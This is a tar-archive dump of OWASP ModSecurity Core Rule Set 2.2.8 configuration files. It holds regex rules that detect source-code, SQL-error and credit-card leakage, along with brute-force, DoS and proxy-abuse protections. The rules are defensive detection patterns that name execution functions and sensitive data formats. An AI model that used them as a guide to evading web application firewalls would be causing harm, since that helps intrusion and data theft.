"(?:\b(?:(?:s(?:erver\.(?:(?:(?:htm|ur)lencod|execut)e|createobject|mappath)|cripting\.filesystemobject)|(?:response\.(?:binary)?writ|vbscript\.encod)e|wscript\.(?:network|shell))\b|javax\.servlet)|\.(?:(?:(?:createtex|ge)t|loadfrom)file|addheader)\b|<jsp:)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'ASP/JSP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970014',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_ASP_JSP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" # PHP source code leakage SecRule RESPONSE_BODY "(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'PHP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970015',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "<\?(?!xml)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'PHP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970902',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'" SecRule RESPONSE_BODY "!(?:\b(?:(?:i(?:nterplay|hdr|d3)|m(?:ovi|thd)|r(?:ar!|iff)|(?:ex|jf)if|f(?:lv|ws)|varg|cws)\b|gif)|B(?:%pdf|\.ra)\b)" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" # Statistics pages revealed SecRule RESPONSE_BODY "\b(?:Th(?:is (?:summary was generated by.{0,100}?(?:w(?:ebcruncher|wwstat)|analog|Jware)|analysis was produced by.{0,100}?(?:calamaris|EasyStat|analog)|report was generated by WebLog)|ese statistics were produced by (?:getstats|PeLAB))|[gG]enerated by.{0,100}?[Ww]ebalizer)\b" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Statistics Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970002',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}" # SQL Errors leakage SecRule RESPONSE_BODY "(?:\b(?:(?:s(?:elect list because it is not contained in (?:an aggregate function and there is no|either an aggregate function or the) GROUP BY clause|upplied argument is not a valid (?:PostgreSQL result|O(?:racle|DBC)|M(?:S |y)SQL))|S(?:yntax error converting the \w+ value .*? to a column of data type|QL Server does not exist or access denied)|Either BOF or EOF is True, or the current record has been deleted(. Requested|; the operation)|The column prefix .{0,50}? does not match with a table name or alias name used in the query|Could not find server '\w+' in sysservers\. execute sp_addlinkedserver)\b|microsoft jet database engine error '8|Microsoft Access Driver|JET Database Engine|Access Database Engine|ORA-\d{5}: |ORA-[0-9][0-9][0-9][0-9]|Oracle error|Oracle.*?Driver|Warning.*?Woci_.*?|Warning.*?Wora_.*?|Un(?:closed quotation mark before the character string\b|able to connect to PostgreSQL server:)|PostgreSQL query failed:|PostgreSQL.*?ERROR|Warning.*?Wpg_.*?|valid PostgreSQL result|Npgsql.|(?:Microsoft OLE DB Provider for .{0,30} [eE]rror |error '800a01b8)'|You have an error in your SQL syntax(?: near ')?|incorrect syntax near (?:\'|the\b|\@\@error\b)|cannot take a \w+ data type as an argument\.|Warning: mysql_connect\(\):)|\[Microsoft\]\[ODBC |Driver.*? SQL[-_ ]*Server|OLE DB.*? SQL Server|(W|A)SQL Server.*?Driver|Warning.*?mssql_.*?|(W|A)SQL Server.*?[0-9a-fA-F]{8}|Exception Details:.*?WSystem.Data.SqlClient.|Exception Details:.*?WRoadhouse.Cms.|SQL syntax.*?MySQL|Warning.*?mysql_.*?|valid MySQL result|MySqlClient.|SQLite\/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*?sqlite_.*?|Warning.*?SQLite3::)" \ "phase:4,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'SQL Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970003',tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # IIS Errors leakage SecRule RESPONSE_BODY "(?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application uses a value of the wrong type for the current operation\b|error')| trappable error occurred in an external object\. The script cannot continue running\b)|Microsoft VBScript (?:compilation (?:\(0x8|error)|runtime (?:Error|\(0x8))\b|Object required: '|error '800)|<b>Version Information:<\/b>(?: |\s)(?:Microsoft \.NET Framework|ASP\.NET) Version:|>error 'ASP\b|An Error Has Occurred|>Syntax error in string in query expression|\/[Ee]rror[Mm]essage\.aspx?\?[Ee]rror\b)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'IIS Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970004',tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_STATUS "!^404$" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'IIS Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970904',tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'" SecRule RESPONSE_BODY "\bServer Error in.{0,50}?\bApplication\b" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # Directory Listing SecRule RESPONSE_BODY "(?:<(?:TITLE>Index of.*?<H|title>Index of.*?<h)1>Index of|>\[To Parent Directory\]<\/[Aa]><br>)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Directory Listing',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970013',tag:'OWASP_CRS/LEAKAGE/INFO_DIRECTORY_LISTING',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}" SecMarker END_OUTBOUND_CHECK ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_59_outbound_blocking.conf�������0000664�0000000�0000000�00000002650�12164572564�0033044�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # You should set the score to the proper threshold you would prefer. If kept at "@gt 0" # it will work similarly to previous Mod CRS rules and will create an event in the error_log # file if there are any rules that match. If you would like to lessen the number of events # generated in the error_log file, you should increase the anomaly score threshold to # something like "@gt 20". This would only generate an event in the error_log file if # there are multiple lower severity rule matches or if any 1 higher severity item matches. # # You should also set the desired disruptive action (deny, redirect, etc...). # # Alert and Block on High Anomaly Scores - this would block outbound data leakages # SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_level}" \ "chain,phase:4,id:'981200',t:none,deny,msg:'Outbound Anomaly Score Exceeded (score %{TX.OUTBOUND_ANOMALY_SCORE}): Last Matched Message: %{tx.msg}',logdata:'Last Matched Data: %{matched_var}'" SecRule TX:ANOMALY_SCORE_BLOCKING "@streq on" chain SecRule TX:/^\d/ "(.*)" ����������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_60_correlation.conf�������������0000664�0000000�0000000�00000005162�12164572564�0031647�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This file is used in post processing after the response has been sent to # the client (in the logging phase). Its purpose is to provide inbound+outbound # correlation of events to provide a more intelligent designation as to the outcome # or result of the transaction - meaning, was this a successful attack? # # Correlated Successful Attack # SecRule &TX:'/LEAKAGE\\\/ERRORS/' "@ge 1" \ "chain,phase:5,id:'981201',t:none,log,pass,skipAfter:END_CORRELATION,severity:'0',msg:'Correlated Successful Attack Identified: (Total Score: %{tx.anomaly_score}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}) Inbound Attack (%{tx.inbound_tx_msg} - Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Data Leakage (%{tx.msg} - Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})'" SecRule &TX:'/WEB_ATTACK/' "@ge 1" "t:none" # Correlated Attack Attempt # SecRule &TX:'/AVAILABILITY\\\/APP_NOT_AVAIL/' "@ge 1" \ "chain,phase:5,id:'981202',t:none,log,pass,skipAfter:END_CORRELATION,severity:'1',msg:'Correlated Attack Attempt Identified: (Total Score: %{tx.anomaly_score}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}) Inbound Attack (%{tx.inbound_tx_msg} Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Application Error (%{tx.msg} - Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})'" SecRule &TX:'/WEB_ATTACK/' "@ge 1" "t:none" SecRule TX:INBOUND_ANOMALY_SCORE "@gt 0" \ "chain,phase:5,id:'981203',t:none,log,noauditlog,pass,skipAfter:END_CORRELATION,msg:'Inbound Anomaly Score (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}): %{tx.inbound_tx_msg}'" SecRule TX:INBOUND_ANOMALY_SCORE "@lt %{tx.inbound_anomaly_score_level}" SecRule TX:INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_level}" \ "phase:5,id:'981204',t:none,log,noauditlog,pass,msg:'Inbound Anomaly Score Exceeded (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}): %{tx.inbound_tx_msg}'" SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_level}" \ "phase:5,id:'981205',t:none,log,noauditlog,pass,msg:'Outbound Anomaly Score Exceeded (score %{TX.OUTBOUND_ANOMALY_SCORE}): %{tx.msg}'" SecMarker END_CORRELATION ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/����������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024433�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_11_brute_force.conf�����0000664�0000000�0000000�00000006507�12164572564�0033410�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#--------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Anti-Automation Rule for specific Pages (Brute Force Protection) # This is a rate-limiting rule set and does not directly correlate whether the # authentication attempt was successful or not. # # # Enforce an existing IP address block and log only 1-time/minute # We don't want to get flooded by alerts during an attack or scan so # we are only triggering an alert once/minute. You can adjust how often # you want to receive status alerts by changing the expirevar setting below. # SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "chain,phase:1,id:'981036',block,msg:'Brute Force Attack Identified from %{tx.real_ip} (%{tx.brute_force_block_counter} hits since last alert)',setvar:ip.brute_force_block_counter=+1" SecRule &IP:BRUTE_FORCE_BLOCK_FLAG "@eq 0" "setvar:ip.brute_force_block_flag=1,expirevar:ip.brute_force_block_flag=60,setvar:tx.brute_force_block_counter=%{ip.brute_force_block_counter},setvar:ip.brute_force_block_counter=0" # # Block and track # of requests but don't log SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:1,id:'981037',block,nolog,setvar:ip.brute_force_block_counter=+1" # # skipAfter Checks # There are different scenarios where we don't want to do checks - # 1. If the user has not defined any URLs for Brute Force Protection in the 10 config file # 2. If the current URL is not listed as a protected URL # 3. If the current IP address has already been blocked due to high requests # In these cases, we skip doing the request counts. # SecRule &TX:BRUTE_FORCE_PROTECTED_URLS "@eq 0" "phase:5,id:'981038',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS" SecRule REQUEST_FILENAME ".*" "chain,phase:5,id:'981039',t:none,nolog,pass,setvar:'tx.filename=#%{request_filename}#',skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS" SecRule TX:FILENAME "!@within %{tx.brute_force_protected_urls}" SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:5,id:'981040',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS" # # Brute Force Counter # Count the number of requests to these resoures # SecAction "phase:5,id:'981041',t:none,nolog,pass,setvar:ip.brute_force_counter=+1" # # Check Brute Force Counter # If the request count is greater than or equal to 50 within 5 mins, # we then set the burst counter # SecRule IP:BRUTE_FORCE_COUNTER "@gt %{tx.brute_force_counter_threshold}" "phase:5,id:'981042',t:none,nolog,pass,t:none,setvar:ip.brute_force_burst_counter=+1,expirevar:ip.brute_force_burst_counter=%{tx.brute_force_burst_time_slice},setvar:!ip.brute_force_counter" # # Check Brute Force Burst Counter and set Block # Check the burst counter - if greater than or equal to 2, then we set the IP # block variable for 5 mins and issue an alert. # SecRule IP:BRUTE_FORCE_BURST_COUNTER "@ge 2" "phase:5,id:'981043',t:none,log,pass,msg:'Potential Brute Force Attack from %{tx.real_ip} - # of Request Bursts: %{ip.brute_force_burst_counter}',setvar:ip.brute_force_block=1,expirevar:ip.brute_force_block=%{tx.brute_force_block_timeout}" SecMarker END_BRUTE_FORCE_PROTECTION_CHECKS �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_11_dos_protection.conf��0000664�0000000�0000000�00000004256�12164572564�0034143�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# # Anti-Automation rule set for detecting Denial of Service Attacks. # # # Enforce an existing IP address block and log only 1-time/minute # We don't want to get flooded by alerts during an attack or scan so # we are only triggering an alert once/minute. You can adjust how often # you want to receive status alerts by changing the expirevar setting below. # SecRule IP:DOS_BLOCK "@eq 1" "chain,phase:1,id:'981044',drop,msg:'Denial of Service (DoS) Attack Identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',setvar:ip.dos_block_counter=+1" SecRule &IP:DOS_BLOCK_FLAG "@eq 0" "setvar:ip.dos_block_flag=1,expirevar:ip.dos_block_flag=60,setvar:tx.dos_block_counter=%{ip.dos_block_counter},setvar:ip.dos_block_counter=0" # # Block and track # of requests but don't log SecRule IP:DOS_BLOCK "@eq 1" "phase:1,id:'981045',t:none,drop,nolog,setvar:ip.dos_block_counter=+1" # # skipAfter Check # There are different scenarios where we don't want to do checks - # 1. If the current IP address has already been blocked due to high requests # In this case, we skip doing the request counts. # SecRule IP:DOS_BLOCK "@eq 1" "phase:5,id:'981046',t:none,nolog,pass,skipAfter:END_DOS_PROTECTION_CHECKS" # # DOS Counter # Count the number of requests to non-static resoures # SecRule REQUEST_BASENAME "!\.(jpe?g|png|gif|js|css|ico)$" "phase:5,id:'981047',t:none,nolog,pass,setvar:ip.dos_counter=+1" # # Check DOS Counter # If the request count is greater than or equal to user settings, # we then set the burst counter # SecRule IP:DOS_COUNTER "@gt %{tx.dos_counter_threshold}" "phase:5,id:'981048',t:none,nolog,pass,t:none,setvar:ip.dos_burst_counter=+1,expirevar:ip.dos_burst_counter=%{tx.dos_burst_time_slice},setvar:!ip.dos_counter" # # Check DOS Burst Counter and set Block # Check the burst counter - if greater than or equal to 2, then we set the IP # block variable for 5 mins and issue an alert. # SecRule IP:DOS_BURST_COUNTER "@ge 2" "phase:5,id:'981049',t:none,log,pass,msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',setvar:ip.dos_block=1,expirevar:ip.dos_block=%{tx.dos_block_timeout}" SecMarker END_DOS_PROTECTION_CHECKS ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_11_proxy_abuse.conf�����0000664�0000000�0000000�00000003162�12164572564�0033443�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Rule set for detecting Open Proxy Abuse/Chaining. # # http://blog.spiderlabs.com/2011/03/detecting-malice-with-modsecurity-open-proxy-abuse.html # # # You must first download the MaxMind GeoIP Lite City DB - # # http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz # # You then need to define the proper path for the SecGeoLookupDb directive # SecGeoLookupDb /usr/local/apache/conf/modsec/GeoLiteCity.dat SecRule REQUEST_HEADERS:X-Forwarded-For "^\b\d{1,3}(?<!192|127|10)\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" "chain,phase:1,id:'981050',t:none,capture,block,rev:'2.2.8',msg:'Potential Open Proxy Abuse - GeoIP Country Code Mismatch of X-Forwarded-For Request Header and Client REMOTE_ADDR',logdata:'IP Country is: %{geo.country_code} and X-Forwarded-For is: %{tx.geo_x-forwarded-for}'" SecRule TX:0 "@geoLookup" "chain,setvar:tx.geo_x-forwarded-for=%{geo.country_code}" SecRule REMOTE_ADDR "@geoLookup" "chain,t:none" SecRule GEO:COUNTRY_CODE "!@streq %{tx.geo_x-forwarded-for}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_11_slow_dos_protection.conf���������������������������������������������������������0000664�0000000�0000000�00000002304�12164572564�0035120�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Rule set for detecting Slow HTTP Denial of Service Attacks. # # http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-mitigating-slow-http-dos-attacks.html # # # Mitigate Slowloris-type slow HTTP attacks # SecReadStateLimit 100 # # Mitigate Slow HTTP POST attacks # # Must have the mod_reqtimeout module installed # You should adjust the RequestReadTimeout body directive setting to a limit # that will allow any legitimate slow clients or large file uplaods. # <IfModule reqtimeout_module> RequestReadTimeout body=30 </IfModule> SecRule RESPONSE_STATUS "@streq 408" "phase:5,id:'981051',t:none,nolog,pass,setvar:ip.slow_dos_counter=+1,expirevar:ip.slow_dos_counter=60" SecRule IP:SLOW_DOS_COUNTER "@gt 5" "phase:1,id:'981052',t:none,log,drop,msg:'Client Connection Dropped due to high # of slow DoS alerts'" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_16_scanner_integration.conf���������������������������������������������������������0000664�0000000�0000000�00000002317�12164572564�0035066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ You must be using the Resource Profiling Rules to track this data ]=- # # modsecurity_crs_40_appsensor_detection_point_2.0_setup.conf # modsecurity_crs_40_appsensor_detection_point_3.0_end.conf # # # -=[ Disable ModSecurity For Arachni Scans ]=- # # Update the remote IP address for your Arachni RPC host # #SecRule REMOTE_ADDR "@ipMatch 192.168.168.128" "chain,id:'900030',phase:1,t:none,nolog,pass" # SecRule REQUEST_HEADERS:User-Agent "@beginsWith Arachni/" "ctl:ruleEngine=Off" # # -=[ Initiate Arachni Scan on 1st URL Access ]=- # # Update the path to the arachni_integration.lua script # #SecRule &RESOURCE:ARACHNI_SCAN_COMPLETED "@eq 0" "chain,id:'900031',phase:5,t:none,log,pass" # SecRule &ARGS "@gt 0" "exec:/etc/apache2/modsecurity-crs/lua/arachni_integration.lua" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_25_cc_track_pan.conf����0000664�0000000�0000000�00000003043�12164572564�0033515�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Credit Card Track 1 and 2 and PAN Leakage Checks # SecRule RESPONSE_BODY "\%[Bb][3456][0-9]{3,3}[\x20\-]{0,3}[0-9]{4,6}[\x20\-]{0,3}[0-9]{2,5}[\x20\-]{0,3}[0-9]{0,4}\^[^\^]+\^[0-9]+\?" \ "phase:4,t:none,block,msg:'Possible Credit Card Track 1 Data Leakage.',severity:'1',id:'920021',tag:'WASCTC/5.2',tag:'PCI/3.3',setvar:tx.anomaly_score=+{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "\;[3456][0-9]{3,3}[\x20\-]{0,3}[0-9]{4,6}[\x20\-]{0,3}[0-9]{2,5}[\x20\-]{0,3}[0-9]{0,4}[=Dd][0-9]+\?" \ "phase:4,t:none,block,msg:'Possible Credit Card Track 2 Data Leakage.',severity:'1',id:'920022',tag:'WASCTC/5.2',tag:'PCI/3.3',setvar:tx.anomaly_score=+{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "[^0-9][3456][0-9]{3,3}[\x20\-]{0,3}[0-9]{4,6}[\x20\-]{0,3}[0-9]{2,5}[\x20\-]{0,3}[0-9]{0,4}[^0-9]" \ "phase:4,t:none,block,msg:'Possible Credit Card PAN Data Leakage.',severity:'1',id:'920023',tag:'WASCTC/5.2',tag:'PCI/3.3',setvar:tx.anomaly_score=+{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_40_appsensor_detection_point_2.0_setup.conf�����������������������������������������0000664�0000000�0000000�00000004674�12164572564�0040117�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ OWASP AppSensor Detection Points - Setup ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints # # Instead of creating rule set based on analyzing saved audit log data, we can # instead profile live transactions in phase:5 post processing and save data in # Resource-based persistent collections. Once we have seen enough traffic (as # defined below) we can then move into Enforcement Mode. # # # --[ Step 1: Initiate the Resource Collection ]-- # # We are using the REQUEST_FILENAME as the key and then set 2 variables - # # [resource.min_pattern_threshold] # Set the resource.min_pattern_threshold as the minimum number of times that a match should occur # in order to include it into the profile # # [resource.min_traffic_threshold] # Set the resource.min_traffic_threshold as the minimum number of "clean" transactions # to profile/inspect before enforcement of the profile begins. # SecAction "phase:1,id:'981082',t:none,nolog,pass,initcol:resource=%{request_headers.host}_%{request_filename},setvar:resource.min_pattern_threshold=50,setvar:resource.min_traffic_threshold=100" # # --[ Ignore Resource ]-- # # If you want to exclude a resource from being profiled, you can specify it in the # modsecurity_40_profiler_ignore.data file. This rule will evaluate the REQUEST_FILENAME # and if there is match in the @pmFromFile check, it will skip all profiling/enforcement # rules in this file. We have to run two checks here - # 1. For Phase:2 - Enforcement Checks # 2. For 